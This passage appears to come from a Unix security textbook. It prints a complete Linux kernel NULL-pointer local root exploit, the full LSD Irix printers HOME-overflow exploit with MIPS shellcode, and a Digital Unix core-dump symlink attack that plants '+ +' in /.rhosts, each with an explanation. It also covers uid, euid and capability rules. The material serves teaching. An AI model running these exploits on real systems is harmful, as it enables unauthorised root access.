                "movl %3, 0x04(%%esp) ;"
                "movl %4, 0x00(%%esp) ;"
                "iret"
                : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
                    "i" (USER_CS), "r" (exit_code)
        );
}

void kernel_code()
{
        int i;
        uint *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();
}

void exit_code()
{
        if (getuid() != 0) {
                fprintf(stderr, "failed\n");
                exit(-1);
        }

        execl("/bin/sh", "sh", "-i", NULL);
}

int main(void) {
        char template[] = "/tmp/padlina.XXXXXX";
        int fdin, fdout;
        void *page;

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        if ((personality(0xffffffff)) != PER_SVR4) {
                if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
                        perror("mmap");
                        return -1;
                }
        } else {
                if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
                        perror("mprotect");
                        return -1;
                }
        }

        *(char *)0 = '\x90';
        *(char *)1 = '\xe9';
        *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

        if ((fdin = mkstemp(template)) < 0) {
                perror("mkstemp");
                return -1;
        }

        if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
                perror("socket");
                return -1;
        }

        unlink(template);
        ftruncate(fdin, PAGE_SIZE);
        sendfile(fdout, fdin, NULL, PAGE_SIZE);
}

And indeed:

% gcc -o run run.c && gcc -o exploit exploit.c && ./run
padlina z lublina!
sh-3.00#

What happens? We have seen get_current() and exit_kernel() and kernel_code() and exit_code() in the vmsplice exploit above. As before, we somehow get the kernel to call kernel_code(), which sets uid and gid to 0 and gives us all capabilities, and then returns to exit_code() and starts a root shell. The new part is that we store 0x90 (nop), 0xe9 (jump) and a value A at addresses 0, 1, and 2-5. (The jump is relative, and the next instruction starts at address 6, so the jump will jump to A+6, that is, to kernel_code.) It remains to get the kernel to jump to address 0 where our code is waiting. But the sendfile() causes the kernel to do

static ssize_t sock_sendpage(...)
{
        ...
        return sock->ops->sendpage(sock, page, offset, size, flags);
}
and for the PF_PPPOX protocol family that pointer is NULL.

Finally, why the personality nonsense? In the SVR4 personality we have access to page 0.

12.6 An Irix example

Remotely logged in to some Irix machine:

$ ./x 123.123.123.123:0
copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/
libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 IP:ALL

Warning: Color name "SGIVeryLightGrey" is not defined
# id
uid=100(aeb) gid=100(foo) euid=0(root)
where 123.123.123.123:0 points at the display of my home machine. A local root exploit. I did this in good script-kiddie style, before understanding what happened. But what happens?

The binary ./x was compiled from

/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                          #*/

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}

It is clear that this is an exploit of /usr/sbin/printers, using a buffer overflow involving the HOME environment variable. And indeed, that program is setuid root, so we can expect profit from a buffer overflow:

# ls -l /usr/sbin/printers
-rwsr-xr-x    1 root     sys       226356 Dec  7  2001 /usr/sbin/printers
# uname -R
6.5 6.5.14m

About the assembler code used, some details are explained by the authors. For some more info on MIPS/IRIX, see Phrack 56#16. First of all, the code is big-endian, for use with IRIX.

The address of the shellcode is obtained using the bltzal $zero instruction. This instruction is a Branch if Less Than Zero And Link, that tests whether 0 is negative and jumps if it is (but it isn't), and writes the return address of this conditional subroutine call, that is, the address shellcode+8, in the $ra register.

The li (load immediate) instruction here fills the delay slot. It is not a dummy: the $v0 register specifies which system call is done. Here 0x3f3=1011 is the execv system call. (System call numbers can be found on an IRIX machine in /usr/include/sys.s.)

In order to obtain the address of the /bin/sh string, we first add 276 and then subtract 248. This is done in this convoluted way because directly adding 28 would involve a 16-bit operand with a zero byte, which cannot be used in a string.

The execv system call is completed by storing the address of the /bin/sh string, then a NULL, and finally a NUL byte terminating the /bin/sh string.

That explains the shellcode[] array. Concerning the setreuidcode[] array: 1024 is the getuid() system call, 1124 is the setreuid() system call. The effect is that we do setreuid(getuid(),0), which sets the effective user ID back to 0 - useful in case of a setuid executable that drops privileges but has a saved user ID that still remembers its former powers. (See also below.)

The peculiar invocations of jump[] read the value of the stack pointer. The return jump needs some instruction to fill the delay slot, and conveniently there is that nop[] array following.

We make an environment that consists only of the HOME= string. That string is filled with 900/4 copies of the address adr, 400/4 copies of the address pch, some padding to correct alignment, 1300/4 NOPs, and the exploit code. The addresses are not aligned in the array buffer, but will be aligned when returned by getenv("HOME").

It remains to explain the final details of the array overflow.

12.7 The Unix permission system

In a Unix-like environment each process has a real user ID, the ID of the user that started the program, an effective user ID, the ID of the user whose powers determine what the program is allowed to do, and a saved user ID, that remembers an earlier effective user ID.

Users can belong to groups, and each process has a real group ID, possibly some supplementary group IDs, an effective group ID, and a saved group ID.

The details are a real mess, and that means that there are lots of security problems with this setup.

User ID

A Unix user has a user ID (uid), a number that encodes his identity. The file /etc/passwd will give the correspondence between name and uid.

A Unix process has a (real) uid, probably inherited from its parent, that indicates what user is running the process. The user logged in, and the login program gave her a shell with appropriate uid, and this uid is inherited across forks.

Traditionally, root, the user with user ID 0, is all-powerful.

Effective user ID

Sometimes a user needs to run a program that can do more than she can do herself. She plays a game, and the program must update the highscore list. She sends mail, and the program must update the mailbox of the recipient. She changes her password, and the password file must be updated. The powers of a program are determined by its effective user ID (euid). Normally the effective user ID equals the user ID of the user that runs the program, but when the mode of the program binary has the setuid bit set, the real user ID of the executing program will be that of the user (process) that started it, but the effective user ID will be the user ID of the owner of the program binary. For example:

-rwsr-xr-x    1 root     root        65008 2004-03-05 03:16 /bin/mount
Ordinary people can run /bin/mount and perhaps do things that require root permission. It is up to the program to find out what it is willing to do for that user.

Saved user ID

Setuid root processes are a security problem because they can do everything, and have to be very careful not to be tricked by the user running them. In order to make life easier for the authors of such programs, POSIX introduced the saved effective user ID. A process can drop its privileges by setting its effective user ID to its real user ID, while the saved effective user ID remembers the previous value. Later, when it needs this power again, the process can set its effective user ID again to its saved effective user ID. Now large parts of the program code will run without any special powers and the risk of being tricked is decreased.

The saved effective user ID is set to the effective user ID directly after each exec.

(Note: "setuid" is often abbreviated "suid", but also "saved effective user ID" is abbreviated so.)

fsuid

In order to make it easier for an NFS server to serve files to many different users, Linux introduced the filesystem user ID. Usually equal to the effective user ID, but the NFS server that runs with effective user ID 0 (for root) can set its fsuid to that of the user who asks for a file. See setfsuid(2).

Capabilities

An all-powerful user root leads to problems. People have tried to split the root power into many different capabilities. See capset(2). The capability system is not used very much. Often it turns out that if one gives someone part of root's power, this can be used to obtain full root power. But the capability system exists, and while it was meant to make a more secure system possible, so far it has mostly resulted in more insecurity.

The problem is that not many programmers know about capabilities. The details are badly documented. And a hacker can abuse the capability system and start a setuid root program in such a way that it lacks some capabilities. Now some of its actions will unexpectedly fail. For example, it may be that its attempt to drop privileges will fail. (Sendmail local root exploit, June 2000, Linux 2.2.15, fixed in 2.2.16.)

Details

These details are for recent Linux systems. Note that details have changed a lot over time, and also are a bit different on other Unix-type systems like *BSD, Solaris, etc.

There are of course many more details. Read the source. (There are 16-bit and 32-bit versions of these calls, and conversions. Calls like setuid() may fail when the maximum number of processes for the target user has been reached. Etc.)

fork

The values of ruid, euid, suid, fsuid, CAP_SETUID are inherited across forks.

exec

If the filesystem was mounted NOSUID, the values of ruid, euid, suid, fsuid are not changed upon an exec(). Otherwise, the value of ruid is preserved, the values of euid and fsuid are preserved when the file executed did not have the setuid bit set, and are set to the owner ID of the file when the setuid bit was set, and finally suid is set to euid.

mount

The MS_NOSUID flag specified for a mount determines whether setuid and setgid bits are honoured with an execve().

setuid

If the invoker has CAP_SETUID then the call setuid(u) sets all of ruid, euid, fsuid, suid to u. Otherwise this call fails if u is not one of ruid, suid, and otherwise sets euid and fsuid to u.

seteuid

The call seteuid(e) sets euid to e. It will fail unless the invoker has CAP_SETUID or e is one of ruid, euid, suid.

setreuid

The call setreuid(r,e) sets ruid, euid to r,e, respectively, or leaves them unchanged when the corresponding parameter is -1. This call will fail unless the process has the CAP_SETUID capability or r is one of -1, ruid, euid and e is one of -1, ruid, euid, suid. If r was not -1 or e was not -1 and not the old ruid, then suid is set to the new euid. Finally fsuid is made equal to the new euid.

setresuid

The call setresuid(r,e,s) sets ruid, euid, suid to r,e,s, respectively, or leaves them unchanged when the corresponding parameter is -1. This call will fail unless the process has the CAP_SETUID capability or each of r,e,s is equal to one of -1, ruid, euid, suid.

Capabilities

There is a set of possible permissions (for a list, see capabilities(7)), and subsets of it are indicated by bitmasks. There is cap_effective, the set of presently enabled capabilities, and cap_permitted, the set of capabilities that this process can enable, and cap_inheritable, the maximum set of capabilities that a child may have. Normally, an ordinary process has none of these capabilities, and root has all of them. System calls are capget(2) and capset(2).

prctl

If a process changes from being root (in the weak sense that at least one of ruid, euid, suid is zero) to being non-root (ruid, euid, suid all nonzero), then by default all capabilities are dropped. However, each process has a "keep capabilities" flag, and if that is set capabilities are not dropped upon becoming non-root. The call prctl(PR_SET_KEEPCAPS,b); (where b is either 0 or 1), sets this "keep capabilities" flag to b.

CAP_SETUID

This is the capability checked by the system calls setuid(), setreuid(), setresuid(), and setfsuid(). This capability allows a process to change user IDs arbitrarily. There is also a corresponding CAP_SETGID.

12.8 Modified system environment

One can run a setuid binary in a modified environment, presenting conditions it was not programmed to handle.

Standard I/O

Most programs expect file descriptors 0, 1, 2 (stdin, stdout, stderr) to be suitable for reading, writing, and writing error messages. But if the invoker of a setuid binary closes for example file descriptor 2 before the exec, then the first file opened by this binary will get file descriptor 2, and a later error message is written to this file.

argv

Most programs expect argv[0] to contain the name that was used to invoke them. But the invoker can make argv[0] an arbitrary string. (This is also used legitimately - for example, for the shell a leading '-' in argv[0] used to be an indicator that this shell was a login shell.) But if a naive program, like sendmail, re-execs itself doing execv(argv[0],argv);, then we have a local root exploit. (1996)

Disk full

Create some very large files so that the disk is full or very nearly full. Not many programs handle the disk full situation well. Output files may be truncated. Programs may crash.

(Filling up a disk can also be a way to make sure what you do afterwards will not be logged by syslog.)

It may be possible to cause a remote disk full condition. A good compressor will compress a very large constant file (say 20 GB of NULs) to something rather small. Send it as an attachment in a letter. Watch the anti-virus software of the receiver unpack it. Some anti-virus software now detects precisely this: a very large file of NULs. But then a very large and very compressible file with something else works.

Stack overflow

Similarly, not many programs expect a stack overflow. But ulimit -s 100; foo starts the program foo in an environment with a very small stack. Probably it will segfault. Let us try.

% ulimit -s 100; mount /zip
% umount /zip
% ulimit -s 10; mount /zip
Segmentation fault
Sometimes it is possible to exploit the messy half-finished situation that is left behind when a program segfaults halfway.

There are other resource limits one can play with. Read bash(1), ulimit(3), getrlimit(2), setrlimit(2), sysconf(3).

Pending signal

One cannot send signals from unprivileged to privileged processes.

(Indeed, the standard says: For a process to have permission to send a signal to a process designated by pid, unless the sending process has appropriate privileges, the real or effective user ID of the sending process shall match the real or saved set-user-ID of the receiving process.)

But an unprivileged process can set up an alarm signal to be sent after a prespecified time, and then exec the setuid binary (a pending alarm survives the exec). Maybe it is killed in the middle of what it was doing, leaving an exploitable messy situation.

Core dumps

Often, core dump files have a predictable name. Sometimes just core. If one plans to make a setuid program dump core it may be useful to have a link or symlink named core in the directory where core will be dumped. Sometimes one can overwrite an arbitrary file in this way.

For example, the following exploit for Digital Unix 4.0 was found by rusty@mad.it and soren@atlink.it.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
$ rlogin localhost -l root
That is, here core is made a symlink to /.rhosts, and by defining a suitable environment variable we make sure that a core file will contain a given string, here one that gives universal entrance permission, then kill the setuid binary with a signal causing a core dump.

There have been many exploits in this direction. A secure system must not allow core dumps of setuid binaries or binaries that were executable only (perhaps they have embedded passwords that should not become readable), or core dumps to a symlink.

The current Linux kernel has for each process a flag dumpable. One can test (and change) its value from user space using the prctl() system call.

Exercise Under precisely what conditions will dumpable be set under the 2.6.0 kernel?

